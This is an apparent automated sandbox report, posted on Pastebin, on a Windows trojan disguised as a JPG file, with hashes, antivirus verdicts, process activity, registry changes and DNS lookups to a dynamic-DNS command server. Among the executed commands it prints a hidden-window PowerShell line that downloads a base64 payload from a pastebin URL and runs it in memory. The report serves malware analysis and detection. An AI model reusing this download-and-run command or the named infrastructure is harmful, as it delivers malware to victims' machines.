Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_fc63382fde12f938bb6845c7c85ddd98.jpg"
- [*] File Size: 61918
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "ecd583181d335b8b624ca13a84c01a6c77a52062174a32deac2da4fd9a41bbf9"
- [*] MD5: "fc63382fde12f938bb6845c7c85ddd98"
- [*] SHA1: "0854da4436c68b7600f7c1ae8217b49fe0dc8bfe"
- [*] SHA512: "aa7ba2ee6a1cae8c990a54cb5cabd72eaf2a6e8dadd1a307cb6a8b0a67809c84e10914b7520080ae1db5766d5f1558733b8cf6bf607e8fd77b7dcebdce66e9f3"
- [*] CRC32: "71AF9A02"
- [*] SSDEEP: "768:3X06/2vJPE9g8CoiesliFBl3WnWRPlNz30iB9L1zIOJlqYWoD4q:U6/2vO9g8CoiedwWRNxDzaof"
- [*] Process Execution: [
- "Exes_fc63382fde12f938bb6845c7c85ddd98.jpg",
- "cmd.exe",
- "attrib.exe",
- "taskkill.exe",
- "powershell.exe",
- "powershell.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details": [
- {
- "IP": "185.255.46.77:333"
- }
- ]
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "attrib.exe, PID 2716"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Attempts to execute a powershell command with suspicious parameter/s",
- "Details": [
- {
- "hidden_window": "Attempts to execute command with a hidden window"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: Exes_fc63382fde12f938bb6845c7c85ddd98.jpg, pid: 1728, offset: 0x0000f000, length: 0x000001de"
- },
- {
- "self_read": "process: Exes_fc63382fde12f938bb6845c7c85ddd98.jpg, pid: 1728, offset: 0x0000f00c, length: 0x000001d2"
- },
- {
- "self_read": "process: Exes_fc63382fde12f938bb6845c7c85ddd98.jpg, pid: 1728, offset: 0x0000f024, length: 0x000001ba"
- },
- {
- "self_read": "process: Exes_fc63382fde12f938bb6845c7c85ddd98.jpg, pid: 1728, offset: 0x0000f03c, length: 0x000001a2"
- },
- {
- "self_read": "process: Exes_fc63382fde12f938bb6845c7c85ddd98.jpg, pid: 1728, offset: 0x0000f1b9, length: 0x00000025"
- },
- {
- "self_read": "process: Exes_fc63382fde12f938bb6845c7c85ddd98.jpg, pid: 1728, offset: 0x0000f1d2, length: 0x0000000c"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "Exes_fc63382fde12f938bb6845c7c85ddd98.jpg -> C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t25966.bat"
- },
- {
- "Process": "cmd.exe -> C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- },
- {
- "suspicious_request": "http://pastebin.com/raw/xaMmAazU"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://pastebin.com/raw/xaMmAazU"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF1f50da7.TMP"
- }
- ]
- },
- {
- "Description": "File has been identified by 46 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "K7AntiVirus": "Trojan-Downloader ( 00539cad1 )"
- },
- {
- "MicroWorld-eScan": "Trojan.GenericKD.40375243"
- },
- {
- "CMC": "Trojan-Ransom.Win32!O"
- },
- {
- "McAfee": "Artemis!FC63382FDE12"
- },
- {
- "Malwarebytes": "Trojan.Crypt"
- },
- {
- "TheHacker": "Trojan/Agent.ojc"
- },
- {
- "K7GW": "Trojan-Downloader ( 00539cad1 )"
- },
- {
- "Arcabit": "Trojan.Generic.D26813CB"
- },
- {
- "Cyren": "W32/Downloader.EDPR-8216"
- },
- {
- "Symantec": "ML.Attribute.HighConfidence"
- },
- {
- "ESET-NOD32": "BAT/TrojanDownloader.Agent.NPQ"
- },
- {
- "Kaspersky": "Trojan.MSIL.Revenge.cme"
- },
- {
- "BitDefender": "Trojan.GenericKD.40375243"
- },
- {
- "NANO-Antivirus": "Trojan.Win32.Revenge.fhypat"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Endgame": "malicious (moderate confidence)"
- },
- {
- "Emsisoft": "Trojan.GenericKD.40375243 (B)"
- },
- {
- "Comodo": "Malware@#1p2mmaid22jus"
- },
- {
- "F-Secure": "Trojan.TR/Dldr.Agent.pdtua"
- },
- {
- "VIPRE": "Trojan.Win32.Generic!BT"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.km"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Sophos": "Mal/Generic-S"
- },
- {
- "SentinelOne": "static engine - malicious"
- },
- {
- "Webroot": "W32.Bot.Gen"
- },
- {
- "Avira": "TR/Dldr.Agent.pdtua"
- },
- {
- "Antiy-AVL": "Trojan/Win32.Agent"
- },
- {
- "Microsoft": "Trojan:Win32/Occamy.B"
- },
- {
- "ViRobot": "Trojan.Win32.Z.Revenge.61918"
- },
- {
- "AhnLab-V3": "Malware/Win32.Generic.C2684380"
- },
- {
- "ZoneAlarm": "Trojan.MSIL.Revenge.cme"
- },
- {
- "GData": "Trojan.GenericKD.40375243"
- },
- {
- "TACHYON": "Trojan/W32.Revenge.61918"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "VBA32": "Trojan.MSIL.Revenge"
- },
- {
- "ALYac": "Trojan.GenericKD.40375243"
- },
- {
- "MAX": "malware (ai score=100)"
- },
- {
- "Ad-Aware": "Trojan.GenericKD.40375243"
- },
- {
- "Zoner": "Trojan.Win32.73680"
- },
- {
- "Yandex": "Trojan.DL.Agent!Ta6sGHyACl4"
- },
- {
- "Ikarus": "Trojan-Downloader.BAT.Agent"
- },
- {
- "AVG": "FileRepMalware"
- },
- {
- "Panda": "Trj/CI.A"
- },
- {
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- },
- {
- "Qihoo-360": "HEUR/QVM07.1.FC21.Malware.Gen"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: [
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t25966.bat\" \"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_fc63382fde12f938bb6845c7c85ddd98.jpg\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t25966.bat \"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_fc63382fde12f938bb6845c7c85ddd98.jpg\"",
- "attrib +h C:\\Users\\user\\AppData\\Local\\Temp\\ytmp",
- "taskkill /F /IM powershell.exe",
- "powershell.exe Stop-Process -processname etc",
- "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe PowerShell.exe -windowstyle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('http://pastebin.com/raw/xaMmAazU'))).EntryPoint.invoke($null,$null)",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "Global\\.net clr networking",
- "RV_MUTEX"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t25966.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t26015.exe",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\P9RWZ2TN33RMCG0QZHOJ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\GCFO49PHI94NKMKSUJIY.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF1f50da7.TMP"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t25966.bat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\ytmp\\t26015.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\P9RWZ2TN33RMCG0QZHOJ.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2440.32811750",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2440.32811750",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2440.32811750",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF1f50da7.TMP"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\powershell_RASAPI32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileDirectory"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "pastebin.com",
- "answers": [
- {
- "data": "104.20.209.21",
- "type": "A"
- },
- {
- "data": "104.20.208.21",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "escan0r.duckdns.org",
- "answers": [
- {
- "data": "185.255.46.77",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "escan0r.zapto.org",
- "answers": []
- }
- ]
- [*] Domains: [
- {
- "ip": "185.255.46.77",
- "domain": "escan0r.duckdns.org"
- },
- {
- "ip": "104.20.208.21",
- "domain": "pastebin.com"
- },
- {
- "ip": "",
- "domain": "escan0r.zapto.org"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://pastebin.com/raw/xaMmAazU",
- "user-agent": "",
- "method": "GET",
- "host": "pastebin.com",
- "version": "1.1",
- "path": "/raw/xaMmAazU",
- "data": "GET /raw/xaMmAazU HTTP/1.1\r\nHost: pastebin.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "CloseHandle",
- "address": "0x40c000"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x40c004"
- },
- {
- "name": "Sleep",
- "address": "0x40c008"
- },
- {
- "name": "CreateDirectoryA",
- "address": "0x40c00c"
- },
- {
- "name": "GetTempPathA",
- "address": "0x40c010"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x40c014"
- },
- {
- "name": "GetTickCount",
- "address": "0x40c018"
- },
- {
- "name": "LCMapStringA",
- "address": "0x40c01c"
- },
- {
- "name": "SetEndOfFile",
- "address": "0x40c020"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40c024"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40c028"
- },
- {
- "name": "GetLastError",
- "address": "0x40c02c"
- },
- {
- "name": "DeleteFileA",
- "address": "0x40c030"
- },
- {
- "name": "ExitProcess",
- "address": "0x40c034"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40c038"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40c03c"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x40c040"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x40c044"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40c048"
- },
- {
- "name": "GetVersion",
- "address": "0x40c04c"
- },
- {
- "name": "HeapFree",
- "address": "0x40c050"
- },
- {
- "name": "SetFilePointer",
- "address": "0x40c054"
- },
- {
- "name": "SetHandleCount",
- "address": "0x40c058"
- },
- {
- "name": "GetStdHandle",
- "address": "0x40c05c"
- },
- {
- "name": "GetFileType",
- "address": "0x40c060"
- },
- {
- "name": "WriteFile",
- "address": "0x40c064"
- },
- {
- "name": "ReadFile",
- "address": "0x40c068"
- },
- {
- "name": "GetProcAddress",
- "address": "0x40c06c"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x40c070"
- },
- {
- "name": "FreeEnvironmentStringsA",
- "address": "0x40c074"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x40c078"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x40c07c"
- },
- {
- "name": "GetEnvironmentStrings",
- "address": "0x40c080"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x40c084"
- },
- {
- "name": "HeapDestroy",
- "address": "0x40c088"
- },
- {
- "name": "HeapCreate",
- "address": "0x40c08c"
- },
- {
- "name": "VirtualFree",
- "address": "0x40c090"
- },
- {
- "name": "RtlUnwind",
- "address": "0x40c094"
- },
- {
- "name": "HeapAlloc",
- "address": "0x40c098"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x40c09c"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x40c0a0"
- },
- {
- "name": "SetStdHandle",
- "address": "0x40c0a4"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x40c0a8"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x40c0ac"
- },
- {
- "name": "GetStringTypeA",
- "address": "0x40c0b0"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x40c0b4"
- },
- {
- "name": "CreateFileA",
- "address": "0x40c0b8"
- },
- {
- "name": "GetCPInfo",
- "address": "0x40c0bc"
- },
- {
- "name": "GetACP",
- "address": "0x40c0c0"
- },
- {
- "name": "LCMapStringW",
- "address": "0x40c0c4"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "ShellExecuteExA",
- "address": "0x40c0cc"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "timeGetTime",
- "address": "0x40c0d4"
- }
- ],
- "dll": "WINMM.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0001da2c",
- "overlay": {
- "size": "0x000001de",
- "offset": "0x0000f000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00406074",
- "timestamp": "2014-08-02 23:47:05",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x0000b000",
- "entropy": "6.29",
- "raw_address": "0x00001000",
- "virtual_size": "0x0000a6ea",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0000c000",
- "size_of_data": "0x00001000",
- "entropy": "3.83",
- "raw_address": "0x0000c000",
- "virtual_size": "0x000009e6",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000d000",
- "size_of_data": "0x00001000",
- "entropy": "3.55",
- "raw_address": "0x0000d000",
- "virtual_size": "0x00b00cf8",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00b0e000",
- "size_of_data": "0x00001000",
- "entropy": "0.00",
- "raw_address": "0x0000e000",
- "virtual_size": "0x00000010",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000c528",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000050"
- },
- {
- "virtual_address": "0x00b0e000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000010"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000c000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000000dc"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "a04f32913d3ef18e07d2c1e3f373c264",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 3,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.IsProcessorFeaturePresent",
- "ole32.dll.OleInitialize",
- "cryptbase.dll.SystemFunction036",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoTaskMemAlloc",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "ole32.dll.CoTaskMemFree",
- "comctl32.dll.#236",
- "oleaut32.dll.#6",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "comctl32.dll.#320",
- "ole32.dll.StringFromGUID2",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "oleaut32.dll.#2",
- "propsys.dll.PSPropertyBag_ReadBSTR",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "shell32.dll.#102",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CoCreateInstance",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "comctl32.dll.#339",
- "ole32.dll.CoUninitialize",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "propsys.dll.#417",
- "ole32.dll.PropVariantClear",
- "oleaut32.dll.#9",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#386",
- "advapi32.dll.RegQueryValueW",
- "apphelp.dll.ApphelpCheckShellObject",
- "propsys.dll.#430",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegGetValueW",
- "advapi32.dll.RegCloseKey",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.CoAllowSetForegroundWindow",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "sfc.dll.SfcIsFileProtected",
- "setupapi.dll.PnpIsFilePnpDriver",
- "kernel32.dll.RegOpenKeyExW",
- "kernel32.dll.RegCloseKey",
- "devrtl.dll.DevRtlGetThreadLogToken",
- "apphelp.dll.AllowPermLayer",
- "kernel32.dll.BaseIsAppcompatInfrastructureDisabled",
- "apphelp.dll.SdbInitDatabase",
- "apphelp.dll.SdbGetMatchingExe",
- "apphelp.dll.SdbReleaseDatabase",
- "mpr.dll.WNetGetConnectionW",
- "ole32.dll.CoCreateGuid",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.NdrClientCall2",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "oleaut32.dll.#500",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "advapi32.dll.SaferIdentifyLevel",
- "advapi32.dll.SaferComputeTokenFromLevel",
- "advapi32.dll.SaferCloseLevel",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "winsta.dll.WinStationFreeMemory",
- "winsta.dll.WinStationCloseServer",
- "winsta.dll.WinStationOpenServerW",
- "winsta.dll.WinStationFreeGAPMemory",
- "winsta.dll.WinStationGetAllProcesses",
- "winsta.dll.WinStationEnumerateProcesses",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.LocaleNameToLCID",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.LCIDToLocaleName",
- "kernel32.dll.GetSystemDefaultLocaleName",
- "oleaut32.dll.#283",
- "oleaut32.dll.#284",
- "ntdll.dll.EtwUnregisterTraceGuids",
- "cryptsp.dll.CryptReleaseContext",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "vssapi.dll.CreateWriter",
- "advapi32.dll.LookupAccountNameW",
- "samcli.dll.NetLocalGroupGetMembers",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.NdrClientCall3",
- "rpcrt4.dll.RpcBindingFree",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamGetMembersInAlias",
- "netutils.dll.NetApiBufferFree",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "ole32.dll.StringFromCLSID",
- "oleaut32.dll.#4",
- "oleaut32.dll.#7",
- "propsys.dll.VariantToPropVariant",
- "wbemcore.dll.Reinitialize",
- "wbemsvc.dll.DllGetClassObject",
- "wbemsvc.dll.DllCanUnloadNow",
- "authz.dll.AuthzInitializeContextFromToken",
- "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
- "authz.dll.AuthzAccessCheck",
- "authz.dll.AuthzFreeAuditEvent",
- "authz.dll.AuthzFreeContext",
- "authz.dll.AuthzInitializeResourceManager",
- "authz.dll.AuthzFreeResourceManager",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventUnregister",
- "advapi32.dll.EventWrite",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegQueryValueExW",
- "wmisvc.dll.IsImproperShutdownDetected",
- "wevtapi.dll.EvtRender",
- "wevtapi.dll.EvtNext",
